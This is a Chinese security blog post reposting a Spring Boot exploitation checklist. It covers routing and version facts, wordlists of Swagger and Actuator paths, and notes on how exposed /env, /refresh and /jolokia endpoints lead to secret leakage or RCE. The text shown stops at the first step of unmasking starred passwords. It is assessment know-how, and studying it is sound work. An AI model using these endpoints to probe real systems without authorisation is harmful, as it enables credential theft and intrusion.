<!DOCTYPE html>
<html lang="zh">
  <head>
    <title>
        SpringBoot漏洞利用总结 - AD钙奶的博客
      </title>
        <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
      content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
    <meta name="renderer" content="webkit">
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no,email=no,adress=no">
    
    <meta name="theme-color" content="#000000" />
    
    <meta http-equiv="window-target" content="_top" />
    
    
    <meta name="description" content="SpringBoot漏洞利用总结" />
    <meta name="generator" content="Hugo 0.89.0 with theme pure" />
    <title>SpringBoot漏洞利用总结 - AD钙奶的博客</title>
    
    
    <link rel="stylesheet" href="https://ad-calcium.github.io/css/style.min.e64d754037c0ee0ec4e20ab1d6f07740ace61729bc03850559b8caa21ae4a597.css">
    
    <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/9.15.10/styles/github.min.css" async>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css" async>
    <meta property="og:title" content="SpringBoot漏洞利用总结" />
<meta property="og:description" content="SpringBoot漏洞利用总结" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ad-calcium.github.io/2021/12/springboot%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-12-10T00:00:00+00:00" />
<meta property="article:modified_time" content="2021-12-10T00:00:00+00:00" />
<meta property="og:see_also" content="https://ad-calcium.github.io/2021/12/apache-log4j%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2021/12/grafana%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Ecve-2021-43798/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2021/11/exchange-xsscve-2021-41349/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2021/11/e-office-v9%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" /><meta property="og:see_also" content="https://ad-calcium.github.io/2021/11/apache-druid-loaddata%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Ecve-2021-36749/" />

<meta itemprop="name" content="SpringBoot漏洞利用总结">
<meta itemprop="description" content="SpringBoot漏洞利用总结"><meta itemprop="datePublished" content="2021-12-10T00:00:00+00:00" />
<meta itemprop="dateModified" content="2021-12-10T00:00:00+00:00" />
<meta itemprop="wordCount" content="9221">
<meta itemprop="keywords" content="web安全," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="SpringBoot漏洞利用总结"/>
<meta name="twitter:description" content="SpringBoot漏洞利用总结"/>

    <!--[if lte IE 9]>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
      <![endif]-->

    <!--[if lt IE 9]>
        <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
      <![endif]-->
  </head>

  
  

  <body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage"><header class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="slimContent">
      <div class="navbar-header">
        <div class="profile-block text-center">
          <a id="avatar" href="https://github.com/ad-calcium" target="_blank">
            <img class="img-circle img-rotate" src="https://ad-calcium.github.io/avatar.png" width="200" height="200">
          </a>
          <h2 id="name" class="hidden-xs hidden-sm">AD钙奶</h2>
          <h3 id="title" class="hidden-xs hidden-sm hidden-md"></h3>
          <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i>China</small>
        </div><div class="search" id="search-form-wrap">
    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i
                        class="icon icon-search"></i></button>
            </span>
        </div>
        <div class="ins-search">
            <div class="ins-search-mask"></div>
            <div class="ins-search-container">
                <div class="ins-input-wrapper">
                    <input type="text" class="ins-search-input" placeholder="想要查找什么..."
                        x-webkit-speech />
                    <button type="button" class="close ins-close ins-selectable" data-dismiss="modal"
                        aria-label="Close"><span aria-hidden="true">×</span></button>
                </div>
                <div class="ins-section-wrapper">
                    <div class="ins-section-container"></div>
                </div>
            </div>
        </div>
    </form>
</div>
        <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
      </div>
      <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
        <ul class="nav navbar-nav main-nav">
            <li class="menu-item menu-item-home">
                <a href="/">
                    <i class="icon icon-home-fill"></i>
                  <span class="menu-title">Home</span>
                </a>
            </li>
            <li class="menu-item menu-item-archives">
                <a href="/posts/">
                    <i class="icon icon-archives-fill"></i>
                  <span class="menu-title">Archives</span>
                </a>
            </li>
            <li class="menu-item menu-item-categories">
                <a href="/categories/">
                    <i class="icon icon-folder"></i>
                  <span class="menu-title">Categories</span>
                </a>
            </li>
            <li class="menu-item menu-item-tags">
                <a href="/tags/">
                    <i class="icon icon-tags"></i>
                  <span class="menu-title">Tags</span>
                </a>
            </li>
        </ul>
      </nav>
    </div>
  </header>

<aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content"><p>不忘初心方能始终</p>
            </div>
        </div>
    </div>
</div>

      <div class="widget">
    <h3 class="widget-title"> 标签</h3>
    <div id="tag-cloud-list" class="widget-body">
            
            
            <a href="https://ad-calcium.github.io/tags/confluence/" class="tag-list-link" rel="1">confluence<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/exchange/" class="tag-list-link" rel="1">exchange<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/mssql/" class="tag-list-link" rel="3">mssql<span
               class="tag-list-count">3</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/mssql%E6%8F%90%E6%9D%83/" class="tag-list-link" rel="2">mssql提权<span
               class="tag-list-count">2</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/mysql%E6%8F%90%E6%9D%83/" class="tag-list-link" rel="1">mysql提权<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/web/" class="tag-list-link" rel="2">web<span
               class="tag-list-count">2</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/web%E5%AE%89%E5%85%A8/" class="tag-list-link" rel="6">web安全<span
               class="tag-list-count">6</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/web%E6%B8%97%E9%80%8F/" class="tag-list-link" rel="1">web渗透<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/win10%E7%9B%B8%E5%85%B3/" class="tag-list-link" rel="1">win10相关<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91/" class="tag-list-link" rel="3">内网<span
               class="tag-list-count">3</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="tag-list-link" rel="5">内网渗透<span
               class="tag-list-count">5</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" class="tag-list-link" rel="4">内网环境搭建<span
               class="tag-list-count">4</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%87%AD%E6%8D%AE%E7%AA%83%E5%8F%96/" class="tag-list-link" rel="1">凭据窃取<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%AE%89%E8%A3%85%E5%8D%9A%E5%AE%A2/" class="tag-list-link" rel="1">安装博客<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="tag-list-link" rel="1">小技巧<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%9C%AA%E6%8E%88%E6%9D%83/" class="tag-list-link" rel="1">未授权<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="tag-list-link" rel="1">横向移动<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86/" class="tag-list-link" rel="1">流量代理<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="tag-list-link" rel="28">漏洞复现<span
               class="tag-list-count">28</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8/" class="tag-list-link" rel="1">端口复用<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85/" class="tag-list-link" rel="1">软件安装<span
               class="tag-list-count">1</span></a>
            
            
            <a href="https://ad-calcium.github.io/tags/%E9%92%93%E9%B1%BC/" class="tag-list-link" rel="1">钓鱼<span
               class="tag-list-count">1</span></a>
            
    </div>
<script>
document.onreadystatechange = () => {
  if (document.readyState === 'complete') {
    tagCloud('#tag-cloud-list a',  15 ,  30 );
  }
};

function tagCloud(where, min, max) {
  let iMax = 0;
  let iMin = 0;
  $(where).each(function() {
    let weight = Number($(this).attr("rel"));
    if(iMax < weight) iMax = weight;
    if(iMin > weight || iMin == 0) iMin = weight;
  });
  let step = (max - min)/(iMax - iMin);
  $(where).each(function() {
    let weight = $(this).attr("rel") - iMin;
    $(this).css({"font-size": min + (weight * step) + 'px'});
  });
};
</script>
</div>

      <div class="widget">
    <h3 class="widget-title"> 分类</h3>
    <div class="widget-body">
        <ul class="category-list">
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/sql%E6%B3%A8%E5%85%A5/" class="category-list-link">sql注入</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/web%E5%AE%89%E5%85%A8/" class="category-list-link">web安全</a><span class="category-list-count">2</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="category-list-link">内网渗透</a><span class="category-list-count">5</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%86%85%E7%BD%91%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" class="category-list-link">内网环境搭建</a><span class="category-list-count">4</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%87%AD%E6%8D%AE%E7%AA%83%E5%8F%96/" class="category-list-link">凭据窃取</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="category-list-link">小技巧</a><span class="category-list-count">3</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%95%B0%E6%8D%AE%E5%BA%93/" class="category-list-link">数据库</a><span class="category-list-count">3</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%9C%AA%E6%8E%88%E6%9D%83%E6%BC%8F%E6%B4%9E/" class="category-list-link">未授权漏洞</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="category-list-link">横向移动</a><span class="category-list-count">1</span></li>
            <li class="category-list-item"><a href="https://ad-calcium.github.io/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="category-list-link">漏洞复现</a><span class="category-list-count">26</span></li>
        </ul>
    </div>
</div>
      <div class="widget">
    <h3 class="widget-title"> 标签</h3>
    <div class="widget-body">
        <ul class="tag-list">
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/confluence/" class="tag-list-link">confluence</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/exchange/" class="tag-list-link">exchange</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/mssql/" class="tag-list-link">mssql</a><span
                    class="tag-list-count">3</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/mssql%E6%8F%90%E6%9D%83/" class="tag-list-link">mssql提权</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/mysql%E6%8F%90%E6%9D%83/" class="tag-list-link">mysql提权</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/web/" class="tag-list-link">web</a><span
                    class="tag-list-count">2</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/web%E5%AE%89%E5%85%A8/" class="tag-list-link">web安全</a><span
                    class="tag-list-count">6</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/web%E6%B8%97%E9%80%8F/" class="tag-list-link">web渗透</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/win10%E7%9B%B8%E5%85%B3/" class="tag-list-link">win10相关</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91/" class="tag-list-link">内网</a><span
                    class="tag-list-count">3</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="tag-list-link">内网渗透</a><span
                    class="tag-list-count">5</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%86%85%E7%BD%91%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" class="tag-list-link">内网环境搭建</a><span
                    class="tag-list-count">4</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%87%AD%E6%8D%AE%E7%AA%83%E5%8F%96/" class="tag-list-link">凭据窃取</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%AE%89%E8%A3%85%E5%8D%9A%E5%AE%A2/" class="tag-list-link">安装博客</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E5%B0%8F%E6%8A%80%E5%B7%A7/" class="tag-list-link">小技巧</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%9C%AA%E6%8E%88%E6%9D%83/" class="tag-list-link">未授权</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/" class="tag-list-link">横向移动</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86/" class="tag-list-link">流量代理</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="tag-list-link">漏洞复现</a><span
                    class="tag-list-count">28</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8/" class="tag-list-link">端口复用</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85/" class="tag-list-link">软件安装</a><span
                    class="tag-list-count">1</span></li>
            
            
            <li class="tag-list-item"><a href="https://ad-calcium.github.io/tags/%E9%92%93%E9%B1%BC/" class="tag-list-link">钓鱼</a><span
                    class="tag-list-count">1</span></li>
            
        </ul>

    </div>
</div>
      
<div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
        <ul class="recent-post-list list-unstyled no-thumbnail">
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2021/12/apache-log4j%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" class="title">Apache Log4j任意代码执行漏洞</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-12-10 00:00:00 &#43;0000 UTC" itemprop="datePublished">2021-12-10</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2021/12/springboot%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/" class="title">SpringBoot漏洞利用总结</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-12-10 00:00:00 &#43;0000 UTC" itemprop="datePublished">2021-12-10</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2021/12/grafana%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9Ecve-2021-43798/" class="title">Grafana任意文件读取漏洞(CVE-2021-43798)</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-12-07 00:00:00 &#43;0000 UTC" itemprop="datePublished">2021-12-07</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2021/11/exchange-xsscve-2021-41349/" class="title">Exchange XSS(CVE-2021-41349)</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-11-29 00:00:00 &#43;0000 UTC" itemprop="datePublished">2021-11-29</time>
                    </p>
                </div>
            </li>
            <li>
                <div class="item-inner">
                    <p class="item-title">
                        <a href="https://ad-calcium.github.io/2021/11/e-office-v9%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" class="title">E-Office v9任意文件上传漏洞</a>
                    </p>
                    <p class="item-date">
                        <time datetime="2021-11-28 00:00:00 &#43;0000 UTC" itemprop="datePublished">2021-11-28</time>
                    </p>
                </div>
            </li>
        </ul>
    </div>
</div>
  </div>
</aside>

    
    
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <h4 class="toc-title">文章目录</h4>
    <nav id="toc" class="js-toc toc">

    </nav>
  </div>
</aside>
<main class="main" role="main"><div class="content">
  <article id="-" class="article article-type-" itemscope
    itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      <h1 itemprop="name">
  <a
    class="article-title"
    href="/2021/12/springboot%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/"
    >SpringBoot漏洞利用总结</a
  >
</h1>

      <div class="article-meta">
        
<span class="article-date">
  <i class="icon icon-calendar-check"></i>&nbsp;
<a href="https://ad-calcium.github.io/2021/12/springboot%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/" class="article-date">
  <time datetime="2021-12-10 00:00:00 &#43;0000 UTC" itemprop="datePublished">2021-12-10</time>
</a>
</span>
<span class="article-category">
  <i class="icon icon-folder"></i>&nbsp;
  <a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/"> web安全 </a>
</span>  
  <span class="article-tag">
    <i class="icon icon-tags"></i>&nbsp;
    <a class="article-tag-link" href="/tags/web%E5%AE%89%E5%85%A8/"> web安全 </a>
  </span>

		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 9221字</span>
		<span class="post-readcount hidden-xs" itemprop="timeRequired">阅读时长: 19分 </span>
      </div>
    </div>
    <div class="article-entry marked-body js-toc-content" itemprop="articleBody">
      <p>Spring Boot 相关漏洞学习资料，利用方法和技巧合集，黑盒安全评估 check list</p>
<p>文章转载至：https://github.com/LandGrey/SpringBootVulExploit</p>
<h2 id="零路由和版本">零：路由和版本</h2>
<h3 id="0x01路由知识">0x01：路由知识</h3>
<ul>
<li>有些程序员会自定义 <code>/manage</code>、<code>/management</code> 、<strong>项目 App 相关名称</strong>为 spring 根路径</li>
<li>Spring Boot Actuator 1.x 版本默认内置路由的起始路径为  <code>/</code> ，2.x 版本则统一以 <code>/actuator</code> 为起始路径</li>
<li>Spring Boot Actuator 默认的内置路由名字，如 <code>/env</code> 有时候也会被程序员修改，比如修改成 <code>/appenv</code></li>
</ul>
<h3 id="0x02版本知识">0x02：版本知识</h3>
<blockquote>
<p>Spring Cloud 是基于 Spring Boot 来进行构建服务，并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合。</p>
</blockquote>
<h4 id="组件版本的相互依赖关系">组件版本的相互依赖关系：</h4>
<table>
<thead>
<tr>
<th>依赖项</th>
<th>版本列表及依赖组件版本</th>
</tr>
</thead>
<tbody>
<tr>
<td>spring-boot-starter-parent</td>
<td><a href="https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent">spring-boot-starter-parent</a></td>
</tr>
<tr>
<td>spring-boot-dependencies</td>
<td><a href="https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-dependencies">spring-boot-dependencies</a></td>
</tr>
<tr>
<td>spring-cloud-dependencies</td>
<td><a href="https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies">spring-cloud-dependencies</a></td>
</tr>
</tbody>
</table>
<h4 id="spring-cloud-与-spring-boot-版本之间的依赖关系">Spring Cloud 与 Spring Boot 版本之间的依赖关系：</h4>
<table>
<thead>
<tr>
<th>Spring Cloud 大版本</th>
<th>Spring Boot 版本</th>
</tr>
</thead>
<tbody>
<tr>
<td>Angel</td>
<td>兼容 Spring Boot 1.2.x</td>
</tr>
<tr>
<td>Brixton</td>
<td>兼容 Spring Boot 1.3.x、1.4.x</td>
</tr>
<tr>
<td>Camden</td>
<td>兼容 Spring Boot 1.4.x、1.5.x</td>
</tr>
<tr>
<td>Dalston</td>
<td>兼容 Spring Boot 1.5.x，不兼容 2.0.x</td>
</tr>
<tr>
<td>Edgware</td>
<td>兼容 Spring Boot 1.5.x，不兼容 2.0.x</td>
</tr>
<tr>
<td>Finchley</td>
<td>兼容 Spring Boot 2.0.x，不兼容 1.5.x</td>
</tr>
<tr>
<td>Greenwich</td>
<td>兼容 Spring Boot 2.1.x</td>
</tr>
<tr>
<td>Hoxton</td>
<td>兼容 Spring Boot 2.2.x</td>
</tr>
</tbody>
</table>
<h4 id="spring-cloud-小版本号的后缀及含义">Spring Cloud 小版本号的后缀及含义:</h4>
<table>
<thead>
<tr>
<th>小版本号后缀</th>
<th>含义</th>
</tr>
</thead>
<tbody>
<tr>
<td>BUILD-SNAPSHOT</td>
<td>快照版，代码不是固定，处于变化之中</td>
</tr>
<tr>
<td>MX</td>
<td>里程碑版</td>
</tr>
<tr>
<td>RCX</td>
<td>候选发布版</td>
</tr>
<tr>
<td>RELEASE</td>
<td>正式发布版</td>
</tr>
<tr>
<td>SRX</td>
<td>(修复错误和 bug 并再次发布的)正式发布版</td>
</tr>
</tbody>
</table>
<h2 id="一信息泄露">一：信息泄露</h2>
<h3 id="0x01路由地址及接口调用详情泄漏">0x01：路由地址及接口调用详情泄漏</h3>
<blockquote>
<p>开发人员没有意识到地址泄漏会导致安全隐患或者开发环境切换为线上生产环境时，相关人员没有更改配置文件，忘记切换环境配置等</p>
</blockquote>
<p>直接访问以下两个 swagger 相关路由，验证漏洞是否存在：</p>
<pre><code>/v2/api-docs
/swagger-ui.html
</code></pre>
<p>其他一些可能会遇到的 swagger、swagger codegen、swagger-dubbo 等相关接口路由：</p>
<pre><code>/swagger
/api-docs
/api.html
/swagger-ui
/swagger/codes
/api/index.html
/api/v2/api-docs
/v2/swagger.json
/swagger-ui/html
/distv2/index.html
/swagger/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/static/swagger.json
/user/swagger-ui.html
/swagger-ui/index.html
/swagger-dubbo/api-docs
/template/swagger-ui.html
/swagger/static/index.html
/dubbo-provider/distv2/index.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
</code></pre>
<p>除此之外，下面的 spring boot actuator 相关路由有时也会包含(或推测出)一些接口地址信息，但是无法获得参数相关信息：</p>
<pre><code>/mappings
/metrics
/beans
/configprops
/actuator/metrics
/actuator/mappings
/actuator/beans
/actuator/configprops
</code></pre>
<p><strong>一般来讲，暴露出 spring boot 应用的相关接口和传参信息并不能算是漏洞</strong>，但是以 &ldquo;<strong>默认安全</strong>&rdquo; 来讲，不暴露出这些信息更加安全。</p>
<p>对于攻击者来讲，一般会仔细审计暴露出的接口以增加对业务系统的了解，并会同时检查应用系统是否存在未授权访问、越权等其他业务类型漏洞。</p>
<h3 id="0x02配置不当而暴露的路由">0x02：配置不当而暴露的路由</h3>
<blockquote>
<p>主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险，或者没有按照标准流程开发，忘记上线时需要修改/切换生产环境的配置</p>
</blockquote>
<p>参考 <a href="https://docs.spring.io/spring-boot/docs/1.5.10.RELEASE/reference/htmlsingle/#production-ready-endpoints">production-ready-endpoints</a> 和 <a href="https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt">spring-boot.txt</a>，可能因为配置不当而暴露的默认内置路由可能会有：</p>
<pre><code>/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
</code></pre>
<p>其中对寻找漏洞比较重要接口的有：</p>
<ul>
<li>
<p><code>/env</code>、<code>/actuator/env</code></p>
<p>GET 请求 <code>/env</code> 会直接泄露环境变量、内网地址、配置中的用户名等信息；当程序员的属性名命名不规范，例如 password 写成 psasword、pwd 时，会泄露密码明文；</p>
<p>同时有一定概率可以通过 POST 请求 <code>/env</code> 接口设置一些属性，间接触发相关 RCE 漏洞；同时有概率获得星号遮掩的密码、密钥等重要隐私信息的明文。</p>
</li>
<li>
<p><code>/refresh</code>、<code>/actuator/refresh</code></p>
<p>POST 请求 <code>/env</code> 接口设置属性后，可同时配合 POST 请求 <code>/refresh</code> 接口刷新属性变量来触发相关 RCE 漏洞。</p>
</li>
<li>
<p><code>/restart</code>、<code>/actuator/restart</code></p>
<p>暴露出此接口的情况较少；可以配合 POST请求 <code>/env</code> 接口设置属性后，再 POST 请求 <code>/restart</code> 接口重启应用来触发相关 RCE 漏洞。</p>
</li>
<li>
<p><code>/jolokia</code>、<code>/actuator/jolokia</code></p>
<p>可以通过 <code>/jolokia/list</code> 接口寻找可以利用的 MBean，间接触发相关 RCE 漏洞、获得星号遮掩的重要隐私信息的明文等。</p>
</li>
<li>
<p><code>/trace</code>、<code>/actuator/httptrace</code></p>
<p>一些 http 请求包访问跟踪信息，有可能在其中发现内网应用系统的一些请求信息详情；以及有效用户或管理员的 cookie、jwt token 等信息。</p>
</li>
</ul>
<h3 id="0x03获取被星号脱敏的密码的明文-方法一">0x03：获取被星号脱敏的密码的明文 (方法一)</h3>
<blockquote>
<p>访问 /env 接口时，spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果</p>
</blockquote>
<h4 id="利用条件">利用条件：</h4>
<ul>
<li>目标网站存在 <code>/jolokia</code> 或 <code>/actuator/jolokia</code> 接口</li>
<li>目标使用了 <code>jolokia-core</code> 依赖（版本要求暂未知）</li>
</ul>
<h4 id="利用方法">利用方法：</h4>
<h5 id="步骤一-找到想要获取的属性名">步骤一： 找到想要获取的属性名</h5>
<p>GET 请求目标网站的 <code>/env</code> 或 <code>/actuator/env</code> 接口，搜索 <code>******</code> 关键词，找到想要获取的被星号 * 遮掩的属性值对应的属性名。</p>
